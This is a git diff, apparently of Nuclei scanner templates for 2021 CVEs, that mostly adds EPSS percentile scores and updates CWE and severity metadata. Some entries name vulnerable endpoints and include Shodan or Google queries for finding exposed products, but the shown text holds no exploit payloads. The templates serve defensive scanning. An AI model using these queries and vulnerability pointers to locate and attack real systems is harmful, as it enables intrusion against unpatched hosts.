cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* + epss-percentile: 0.71111 metadata: max-request: 2 shodan-query: http.html:"ImpressCMS" diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index 2e2c8173d1..61b515bbbd 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00156 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* + epss-percentile: 0.51402 metadata: max-request: 1 vendor: eprints diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index f642290df7..355407b663 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* + epss-percentile: 0.40934 metadata: max-request: 1 vendor: redwood diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index c82edcfe1f..f00a9d1da2 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26723 cwe-id: CWE-79 - epss-score: 0.05479 + epss-score: 0.06264 cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* + epss-percentile: 0.9267 metadata: max-request: 1 vendor: jenzabar diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index b2d46db6e3..98acbe6955 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00837 cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* + epss-percentile: 0.79912 metadata: max-request: 1 framework: moodle diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 509fb22ebe..ac3cc6bfdb 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26855 cwe-id: CWE-918 - epss-score: 0.97537 + epss-score: 0.9751 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:* + epss-percentile: 0.99969 metadata: max-request: 1 shodan-query: vuln:CVE-2021-26855 diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 5c8f9b7c83..0fd3481471 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 - epss-score: 0.02711 + epss-score: 0.02194 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.88002 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index 61155ac8e0..1ff6f6f768 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27132 cwe-id: CWE-74 - epss-score: 0.03379 + epss-score: 0.03662 cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:* + epss-percentile: 0.9051 metadata: max-request: 1 vendor: sercomm diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index ed7bf5330d..bb06bbdad9 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* + epss-percentile: 0.40466 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index dc86a662ab..c4e0f82687 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* + epss-percentile: 0.40466 metadata: max-request: 1 vendor: csphere diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 3fb844e4ac..e5510b2424 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27314 cwe-id: CWE-89 - epss-score: 0.30513 + epss-score: 0.30796 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.96384 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 7a0edb44ea..c49b1e6128 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27315 cwe-id: CWE-89 - epss-score: 0.15962 + epss-score: 0.10777 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.94338 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index b80ebd1e21..8b061b13ae 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27316 cwe-id: CWE-89 - epss-score: 0.15962 + epss-score: 0.10777 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.94338 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index f9dcbaa3f9..a3a11fc09e 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27319 cwe-id: CWE-89 - epss-score: 0.15962 + epss-score: 0.10777 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.94338 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index adf4d9e425..f908332dea 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27320 cwe-id: CWE-89 - epss-score: 0.20333 + epss-score: 0.14008 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.94957 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 1bb122836b..a4ca85685e 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-27330 cwe-id: CWE-79 - epss-score: 0.00218 + epss-score: 0.0031 cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* + epss-percentile: 0.66185 metadata: max-request: 1 google-query: intitle:TriConsole.com - PHP Calendar Date Picker diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 843caf096b..3384d2d389 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-306 epss-score: 0.02345 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-percentile: 0.88377 metadata: max-request: 1 shodan-query: title:"Grafana" diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index aef63442cf..190232da88 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00189 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* + epss-percentile: 0.55657 metadata: max-request: 1 shodan-query: 'http.html:"Powered by: FUDforum"' diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index e35c6414be..e54420d87f 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00189 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* + epss-percentile: 0.55657 metadata: max-request: 2 shodan-query: html:"FUDforum" diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 5350cba86a..27e9c5934c 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -13,9 +13,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27561 - cwe-id: CWE-918 - epss-score: 0.97477 + cwe-id: CWE-78 + epss-score: 0.97493 cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* + epss-percentile: 0.99958 metadata: max-request: 1 vendor: yealink diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 81ff8dd51b..8d306bcf1b 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27651 cwe-id: CWE-287 - epss-score: 0.02303 + epss-score: 0.03154 cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:* + epss-percentile: 0.89839 metadata: max-request: 1 vendor: pega diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index fc1c5b4846..1ef2410224 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -3,17 +3,25 @@ id: CVE-2021-27670 info: name: Appspace 6.2.4 - Server-Side Request Forgery author: ritikchaddha - severity: high + severity: critical description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter. reference: - https://github.com/h3110mb/PoCSSrfApp - https://nvd.nist.gov/vuln/detail/CVE-2021-27670 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-27670 + cwe-id: CWE-918 + epss-score: 0.32169 + cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* + epss-percentile: 0.96438 metadata: max-request: 1 verified: true shodan-query: title:"Appspace" + vendor: appspace + product: appspace tags: cve,cve2023,appspace,ssrf http: diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index cdad826ad0..8890bb10b6 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -27,6 +27,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index 9f79238f05..e0da3906cf 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27850 - cwe-id: CWE-200,CWE-502 - epss-score: 0.97413 + cwe-id: CWE-502,CWE-200 + epss-score: 0.97402 cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* + epss-percentile: 0.99878 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 42910c793e..64d696797a 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-918 epss-score: 0.9728 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + epss-percentile: 0.99779 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 83ec27c70a..8a924d825a 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00094 cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* + epss-percentile: 0.38928 metadata: max-request: 1 shodan-query: title:"Mautic" diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index db5f54a64f..ece4b06420 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -13,8 +13,9 @@ info: cvss-score: 9.1 cve-id: CVE-2021-27931 cwe-id: CWE-611 - epss-score: 0.7051 + epss-score: 0.68126 cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* + epss-percentile: 0.9753 metadata: max-request: 1 vendor: lumis diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml index b937929ab7..e932efbbcd 100644 --- a/http/cves/2021/CVE-2021-28073.yaml +++ b/http/cves/2021/CVE-2021-28073.yaml @@ -9,12 +9,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27573 - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/ - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md + remediation: Upgrade to version 4.3 or later. classification: cve-id: CVE-2021-28073 - remediation: Upgrade to version 4.3 or later. - tags: ntopng,cve,cve2021 metadata: max-request: 2 + tags: ntopng,cve,cve2021 http: - method: GET diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index ba59ae2d97..cd6585893c 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-28149 cwe-id: CWE-22 - epss-score: 0.05232 + epss-score: 0.06892 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* + epss-percentile: 0.93035 metadata: max-request: 2 vendor: hongdian diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 9c4bcb7ee8..471cad4428 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-425 epss-score: 0.00339 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* + epss-percentile: 0.67725 metadata: max-request: 2 vendor: hongdian diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index ca476e91fa..5329180d03 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-78 epss-score: 0.97079 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* + epss-percentile: 0.99662 metadata: max-request: 2 vendor: hongdian diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index f93353702f..536c5026ac 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-200 epss-score: 0.02064 cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:* + epss-percentile: 0.87606 metadata: max-request: 1 vendor: eclipse diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 63601fb12d..fcded57edf 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-200 epss-score: 0.00116 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* + epss-percentile: 0.44634 metadata: max-request: 2 vendor: eclipse diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 1de8b242fc..01003f16c7 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -13,8 +13,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28377 cwe-id: CWE-22 - epss-score: 0.00118 + epss-score: 0.00158 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* + epss-percentile: 0.51652 metadata: max-request: 1 framework: joomla diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index b7b278201f..da36124cd0 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.2 cve-id: CVE-2021-28419 cwe-id: CWE-89 - epss-score: 0.13147 + epss-score: 0.17236 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* + epss-percentile: 0.9541 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml index a0182a6c07..81eb44895a 100644 --- a/http/cves/2021/CVE-2021-28854.yaml +++ b/http/cves/2021/CVE-2021-28854.yaml @@ -4,16 +4,14 @@ info: name: VICIdial Sensitive Information Disclosure author: pdteam severity: high - description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug - information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial - systems. + description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. reference: - https://github.com/JHHAX/VICIdial classification: cve-id: CVE-2021-28854 - tags: cve,cve2021 metadata: max-request: 1 + tags: cve,cve2021 http: - method: GET diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index 2361230711..51eadd2fad 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2021-28918 - cwe-id: CWE-20 - epss-score: 0.02589 + cwe-id: CWE-704 + epss-score: 0.02788 cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:* + epss-percentile: 0.89291 metadata: max-request: 3 framework: node.js diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index 31a4b2c3d5..e5fca40e4d 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-312 epss-score: 0.03352 cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:* + epss-percentile: 0.90136 metadata: max-request: 1 vendor: acexy diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index 76778c67d6..d4751526b9 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-29156 cwe-id: CWE-74 - epss-score: 0.35656 + epss-score: 0.42881 cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* + epss-percentile: 0.96852 metadata: max-request: 3 shodan-query: http.title:"OpenAM" diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index a3641d095b..43e4d8f329 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-29203 cwe-id: CWE-306 - epss-score: 0.9596 + epss-score: 0.95703 cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.99168 metadata: max-request: 2 vendor: hp diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 1ee4449140..45a9886f0b 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -22,8 +22,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-29441 cwe-id: CWE-290 - epss-score: 0.96642 + epss-score: 0.96644 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* + epss-percentile: 0.9947 metadata: max-request: 2 vendor: alibaba diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index fb3a1b0088..356fccffdb 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-29442 cwe-id: CWE-306 - epss-score: 0.96984 + epss-score: 0.96994 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* + epss-percentile: 0.99621 metadata: max-request: 1 vendor: alibaba diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 35f99aec52..3b607c24b7 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.01083 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* + epss-percentile: 0.82494 metadata: max-request: 1 framework: node.js diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index b1b1c9c4df..2e915c7c1c 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-918 epss-score: 0.00137 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* + epss-percentile: 0.48378 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index f395159d98..6013202ad2 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-502 epss-score: 0.02373 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.88448 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index 356e9b5b18..f20a058c91 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.00225 cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* + epss-percentile: 0.60091 metadata: max-request: 1 vendor: prometheus diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 6d5f0c629a..7e629c1fc7 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00212 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* + epss-percentile: 0.58458 metadata: max-request: 1 vendor: adminer diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 45fcf69abf..0d12e71690 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* + epss-percentile: 0.47974 metadata: max-request: 1 vendor: "seopanel" diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 000f3830f0..a4773ca8a4 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* + epss-percentile: 0.40864 metadata: max-request: 1 vendor: sysaid diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index ef48497b66..71b7330908 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30128 cwe-id: CWE-502 - epss-score: 0.19248 + epss-score: 0.18312 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* + epss-percentile: 0.95512 metadata: max-request: 1 fofa-query: app="Apache_OFBiz" diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index d26bcea0c4..f731e55e9b 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-30134 cwe-id: CWE-79 - epss-score: 0.00064 + epss-score: 0.00071 cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* + epss-percentile: 0.29012 metadata: max-request: 1 google-query: inurl:"/php-curl-test/post_file_path_upload.php" diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index b04427f75a..d50aff8b47 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00435 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* + epss-percentile: 0.71462 metadata: max-request: 1 vendor: contribsys diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index 081c71cbff..ccf6a4bc50 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -14,6 +14,7 @@ info: cve-id: CVE-2021-3017 epss-score: 0.0151 cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.85325 metadata: max-request: 1 vendor: intelbras diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 2d4ee8432d..acbcb8e0db 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.03345 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* + epss-percentile: 0.9012 metadata: max-request: 1 vendor: zerof diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index e3a89b5bf9..9221ef6bb4 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-3019 cwe-id: CWE-22 - epss-score: 0.01187 + epss-score: 0.01151 cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* + epss-percentile: 0.83025 metadata: max-request: 